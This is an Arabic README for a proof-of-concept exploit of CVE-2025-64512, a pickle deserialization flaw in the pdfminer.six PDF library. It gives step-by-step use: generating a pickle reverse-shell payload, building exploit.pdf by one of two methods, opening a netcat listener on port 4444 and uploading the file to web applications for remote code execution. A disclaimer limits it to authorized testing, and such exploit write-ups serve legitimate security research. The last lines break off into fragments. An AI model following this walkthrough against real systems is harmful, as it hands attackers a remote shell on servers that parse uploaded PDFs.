
إثبات مفهوم (PoC) لاستغلال CVE-2025-64512 يستهدف إلغاء التسلسل غير الآمن في pdfminer.six. يولّد حمولة pickle خبيثة وينتج ملفات PDF استغلالية لتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر رفع الملفات على الويب.
إثبات المفهوم هذا مخصص لاختبار الأمان المصرح به والأغراض التعليمية فقط.
استخدمه فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الكود.
CVE-2025-64512 هو ثغرة أمنية حرجة في pdfminer.six، وهي مكتبة Python شائعة لاستخراج النصوص والبيانات الوصفية من ملفات PDF. يتيح هذا الخلل تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر إلغاء تسلسل غير آمن لبيانات pickle عند معالجة ملف PDF خبيث.
غالبًا ما يتم استغلال الثغرة عبر وظيفة رفع الملفات في تطبيقات الويب التي تستخدم pdfminer.six لتحليل مستندات PDF المرفوعة (مثل أنظمة إدارة المستندات، وأدوات إعداد التقارير، ورفع صور الملفات الشخصية التي تقبل ملفات PDF).
شغّل generate_pickle.py لإنشاء malicious.pickle.gz، والذي يحتوي على حمولة قشرة عكسية خاصة بك.
python3 generate_pickle.py
اختر إحدى الطريقتين المتاحتين:
# Method 1: /Encoding path traversal (less reliable)
python3 method1_encoding_poc.py
# Method 2: /CMap deserialization (official CVE method – RECOMMENDED)
python3 method2_cmap_poc.py
ينتج كلا السكربتين ملف exploit.pdf، الذي يشير إلى ملف pickle الخبيث ويُطلق خلل إلغاء التسلسل عند معالجته.
nc -lvnp 4444
exploit.pdf عبر واجهة الويب.pdfminer.six.